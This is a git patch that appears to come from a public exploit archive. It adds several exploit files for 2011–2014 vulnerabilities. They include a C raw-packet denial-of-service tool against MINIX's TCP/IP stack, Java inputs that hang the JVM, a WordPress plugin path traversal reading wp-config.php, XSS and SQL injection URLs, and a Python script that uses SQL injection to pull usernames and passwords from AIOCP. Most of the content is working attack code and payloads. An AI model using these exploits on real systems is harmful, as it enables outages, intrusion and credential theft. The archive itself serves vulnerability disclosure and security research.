From bf592f75896ee15b0c88ca8110e27f00b84b7ea8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 21 Nov 2014 04:46:52 +0000 Subject: [PATCH] Updated 11_21_2014 --- files.csv | 7 ++ platforms/linux/dos/35302.c | 182 +++++++++++++++++++++++++++++++ platforms/multiple/dos/35304.txt | 30 +++++ platforms/php/webapps/35301.html | 56 ++++++++++ platforms/php/webapps/35303.txt | 24 ++++ platforms/php/webapps/35305.txt | 9 ++ platforms/php/webapps/35306.txt | 9 ++ platforms/php/webapps/35307.py | 34 ++++++ 8 files changed, 351 insertions(+) create mode 100755 platforms/linux/dos/35302.c create mode 100755 platforms/multiple/dos/35304.txt create mode 100755 platforms/php/webapps/35301.html create mode 100755 platforms/php/webapps/35303.txt create mode 100755 platforms/php/webapps/35305.txt create mode 100755 platforms/php/webapps/35306.txt create mode 100755 platforms/php/webapps/35307.py diff --git a/files.csv b/files.csv index b42109311..817302eea 100755 --- a/files.csv +++ b/files.csv @@ -31793,3 +31793,10 @@ id,file,description,date,author,platform,type,port 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 'PHPCOVERAGE_HOME' Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 Cross Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 'id' Parameter Cross Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 +35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80 +35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337 +35303,platforms/php/webapps/35303.txt,"Paid Memberships Pro 1.7.14.2 Path Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 +35304,platforms/multiple/dos/35304.txt,"Oracle Java Floating-Point Value Denial of Service Vulnerability",2011-02-01,"Konstantin Preisser",multiple,dos,0 +35305,platforms/php/webapps/35305.txt,"ACollab 't' Parameter SQL Injection Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 +35306,platforms/php/webapps/35306.txt,"TCExam 11.1.16 'user_password' Parameter Cross Site Scripting Vulnerability",2011-02-02,"AutoSec Tools",php,webapps,0 +35307,platforms/php/webapps/35307.py,"All In One Control Panel 1.4.1 'cp_menu_data_file.php' SQL Injection Vulnerability",2011-01-31,"AutoSec Tools",php,webapps,0 diff --git a/platforms/linux/dos/35302.c b/platforms/linux/dos/35302.c new file mode 100755 index 000000000..8fca880e4 --- /dev/null +++ b/platforms/linux/dos/35302.c @@ -0,0 +1,182 @@ +/* + _-------------------------------------------------------_ + ||------+ MINIX <= 3.3.0 Remote TCP/IP Stack DoS +------|| + ||_______________________________________________________|| + ||--=[ Alejandro Hernandez < nitr0us > ]=--|| + ||--=[ Nov 2014 ]=--|| + ||--=[ Mexico ]=--|| + -_______________________________________________________- +_____________________________________________________________________________________ + + MINIX IS PRONE TO DENIAL OF SERVICE IN THE TCP/IP STACK (/service/inet) BY SENDING + A SINGLE TCP PACKET WITH A MALFORMED TCP OPTION. A TCP OPTION WITH LENGTH OF ZERO + WOULD CAUSE inet TO END UP IN AN INFINITE LOOP. + + BECAUSE OF MINIX'S MICROKERNEL NATURE, THE NETWORKING SERVICE RUNS IN USERLAND AND + THEREFORE, THE MOST CRITICAL PARTS OF THE RUNNING KERNEL ARE UNAFFECTED. + + THIS ISSUE HAS BEEN REPORTED AND ALREADY FIXED: + https://github.com/Stichting-MINIX-Research-Foundation/minix/issues/7 +_____________________________________________________________________________________ + + MINIX 3 + http://minix3.org + + Microkernel (Slide 26) + http://www.eecs.harvard.edu/~mdw/course/cs161/notes/osstructure.pdf + + TCP Option Kind Numbers + http://www.iana.org/assignments/tcp-parameters/tcp-parameters.xhtml#tcp-parameters-1 +_____________________________________________________________________________________ + +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#define __FAVOR_BSD 1 /* Use BSD's tcp header style */ +#include + +#define IPSIZE sizeof(struct ip) +#define TCPSIZE sizeof(struct tcphdr) + +#define DEFAULT_SRC_IP "1.3.3.7" + +uint16_t _checksum(uint16_t * addr, int len) { + int nleft = len; + int sum = 0; + + uint16_t *w = addr; + uint16_t answer = 0; + + while(nleft > 1){ + sum += *w++; + nleft -= sizeof(uint16_t); + } + + if(nleft == 1){ + *(uint8_t *) (&answer) = *(uint8_t *) w; + sum += answer; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; + + return (answer); +} + +int main(int argc, char **argv) +{ + char *packet= (char *) malloc(IPSIZE + TCPSIZE + 4); + char *srcip = DEFAULT_SRC_IP; + int sockfd, count; + int pseudo_hdr_size = 12 + TCPSIZE + 4; // 12 bytes for the pseudo-header; 4 bytes for the payload + int one = 1; /* setsockopt() */ + struct sockaddr_in target; + struct hostent *host2ip; + struct ip *IP = (struct ip *) packet; + struct tcphdr *TCP = (struct tcphdr *) (packet + IPSIZE); + unsigned char pseudo_hdr_for_checksum[pseudo_hdr_size]; + + if(argc < 2){ + printf(" _-------------------------------------------------------_\n"); + printf(" ||------+ MINIX <= 3.3.0 Remote TCP/IP Stack DoS +------||\n"); + printf(" -_______________________________________________________-\n\n"); + printf("Usage: %s \n", argv[0]); + + exit(-1); + } + + if((host2ip = gethostbyname(argv[1])) == NULL){ + perror("gethostbyname"); + exit(-1); + } + + if(getuid() != 0){ + fprintf(stderr, "You must be root to create raw sockets.\n"); + exit(-1); + } + + memset(packet, 0x00, sizeof(packet)); + memset(&target, 0x00, sizeof(target)); + + target.sin_family = AF_INET; + target.sin_port = htons(31337); + target.sin_addr = *((struct in_addr *)host2ip->h_addr); + + /*** SEMI-VALID TCP/IP PACKET ***/ + IP->ip_src.s_addr = inet_addr(srcip); + IP->ip_dst.s_addr = target.sin_addr.s_addr; + IP->ip_hl = 0x05; + IP->ip_v = 0x04; + IP->ip_tos = 0x00; + IP->ip_len = htons(IPSIZE + TCPSIZE + 4); + IP->ip_id = 0x01; + IP->ip_ttl = 0xff; + IP->ip_p = IPPROTO_TCP; + IP->ip_sum = _checksum((uint16_t *) IP, IPSIZE); + + TCP->th_sport = htons(0xcafe); + TCP->th_dport = htons(31337); + TCP->th_seq = htonl(rand()); + TCP->th_ack = htonl(rand()); + TCP->th_off = ((TCPSIZE + 4) / 4); + TCP->th_win = htons(0x1337); + TCP->th_flags = rand() & 0x0f; + TCP->th_sum = 0x00; + + /* Malformed TCP Options + Initially tested with "\x03\x00\x00\x00" but realized that MINIX 3 hangs even with 2, 3, 4, 5, + 6, 7, 8, 0x7f, 0xff, in the first byte. Then, I found out that if the option size (the 2nd byte) + is higher than zero, the stack doesn't hang. For this PoC, "\xff\x00\x00\x00" is used: */ + memcpy(packet + IPSIZE + TCPSIZE, "\xff\x00\x00\x00", 4); + + // TCP Checksum Calculation and the TCP "Pseudo Header" + // http://www.tcpipguide.com/free/t_TCPChecksumCalculationandtheTCPPseudoHeader-2.htm + memset(pseudo_hdr_for_checksum, 0x00, pseudo_hdr_size); + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 0)) = IP->ip_src.s_addr; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 4)) = IP->ip_dst.s_addr; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 8)) = 0x00; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 9)) = IPPROTO_TCP; + *((unsigned long *)((unsigned char *) pseudo_hdr_for_checksum + 10)) = htons(TCPSIZE + 4); + memcpy(pseudo_hdr_for_checksum + 12, ((unsigned char *) packet) + IPSIZE, TCPSIZE + 4); + + TCP->th_sum = _checksum((uint16_t *) &pseudo_hdr_for_checksum, pseudo_hdr_size); + + printf("-=[ Computed IP header checksum: IP->ip_sum = 0x%x\n", IP->ip_sum); + printf("-=[ Computed TCP header checksum: TCP->th_sum = 0x%x\n\n", TCP->th_sum); + printf("-=[ Sending malformed TCP/IP packet...\n\n"); + + if((sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) == -1){ + perror("socket"); + exit(-1); + } + + if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) == -1){ + perror("setsockopt"); + exit(-1); + } + + if((count = sendto(sockfd, packet, IPSIZE + TCPSIZE + 4, 0, (struct sockaddr *) &target, sizeof(target))) == -1){ + perror("sendto"); + close(sockfd); + exit(-1); + } + + close(sockfd); + + printf("-=[ Sent %d bytes to %s:31337\n", count, argv[1]); + printf("-=[ TCP/IP stack should be hanged now\n"); + printf("-=[ Try to ping %s... \n", argv[1]); + + return 0; +} diff --git a/platforms/multiple/dos/35304.txt b/platforms/multiple/dos/35304.txt new file mode 100755 index 000000000..97b1f5e8f --- /dev/null +++ b/platforms/multiple/dos/35304.txt @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/46091/info + +Oracle Java is prone to a remote denial-of-service vulnerability. + +Successful attacks will cause applications written in Java to hang, creating a denial-of-service condition. + +This issue affects both the Java compiler and Runtime Environment. + +Send a Java Program Into An Infinite Loop + +Compile this program and run it; the program will hang (at least it does on a 32-bit system with the latest JRE/JDK): + +class runhang { +public static void main(String[] args) { + System.out.println("Test:"); + double d = Double.parseDouble("2.2250738585072012e-308"); + System.out.println("Value: " + d); + } +} + +Send the Java Compiler Into An Infinite Loop + +Try to compile this program; the compiler will hang: + +class compilehang { +public static void main(String[] args) { + double d = 2.2250738585072012e-308; + System.out.println("Value: " + d); + } +} \ No newline at end of file diff --git a/platforms/php/webapps/35301.html b/platforms/php/webapps/35301.html new file mode 100755 index 000000000..5d00b624a --- /dev/null +++ b/platforms/php/webapps/35301.html @@ -0,0 +1,56 @@ +? + + + + +
+ + + + + + + + + + + +
+ + diff --git a/platforms/php/webapps/35303.txt b/platforms/php/webapps/35303.txt new file mode 100755 index 000000000..b20a8b256 --- /dev/null +++ b/platforms/php/webapps/35303.txt @@ -0,0 +1,24 @@ +# Exploit Title: Paid Memberships Pro 1.7.14.2 Path Traversal +# Date: 14-10-2014 +# Exploit Author: Kacper Szurek - http://security.szurek.pl +# Software Link: https://downloads.wordpress.org/plugin/paid-memberships-pro.1.7.14.2.zip +# Category: webapps +# CVE: CVE-2014-8801 + +1. Description + +getfile.php is accessible to everyone. +is_admin() is used to check priveleges but because this code is run in context of wp-admin/admin-ajax.php this function always evalute to true. +$_SERVER['REQUEST_URI'] is not escaped. + +http://security.szurek.pl/paid-memberships-pro-17142-path-traversal.html + +2. Proof of Concept + +http://wordpress-url/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php + +3. Solution: + +Update to version 1.7.15 +http://downloads.wordpress.org/plugin/paid-memberships-pro.1.7.15.zip +http://www.paidmembershipspro.com/2014/11/critical-security-update-pmpro-v1-7-15/ \ No newline at end of file diff --git a/platforms/php/webapps/35305.txt b/platforms/php/webapps/35305.txt new file mode 100755 index 000000000..59fa74a10 --- /dev/null +++ b/platforms/php/webapps/35305.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46095/info + +ACollab is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +ACollab 1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a \ No newline at end of file diff --git a/platforms/php/webapps/35306.txt b/platforms/php/webapps/35306.txt new file mode 100755 index 000000000..2c0e42c2f --- /dev/null +++ b/platforms/php/webapps/35306.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/46096/info + +TCExam is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +TCExam 11.1.016 is vulnerable; other versions may also be affected. + +http://www.example.com/tcexam/public/code/tce_user_registration.php?user_password=testab%22%3E%3Cscript%3Ealert(0)%3C/script%3E%3Cinput%20type=%22hidden \ No newline at end of file diff --git a/platforms/php/webapps/35307.py b/platforms/php/webapps/35307.py new file mode 100755 index 000000000..f453f4195 --- /dev/null +++ b/platforms/php/webapps/35307.py @@ -0,0 +1,34 @@ +source: http://www.securityfocus.com/bid/46097/info + +All In One Control Panel (AIOCP) is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +AIOCP 1.4.001 is vulnerable; other versions may also be affected. + +import re, socket + +host = 'localhost' +port = 80 + +r = re.compile('\'([^\']+):([^\s]+)\sLIMIT') + +# Search user ids 0 through 16 +for i in range(0,16): + + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + s.settimeout(8) + s.send("GET /AIOCP/public/code/cp_menu_data_file.php?menu='or%201=1%20UNION%20ALL%20SELECT%201,0,CONCAT(',',user_name,':',user_password)%20as%20menulst_name,0%20FROM%20aiocp_users%20ORDER%20BY%20menulst_style%20LIMIT%20" + str(i) + ",1;%23 HTTP/1.1\r\n" + 'Host: ' + host + '\r\n' + '\r\n') + + resp = s.recv(8192) + + m = r.search(resp) + + if m is None: continue + + print 'Username: ' + m.group(1) + '\nPassword: ' + m.group(2) + '\n' +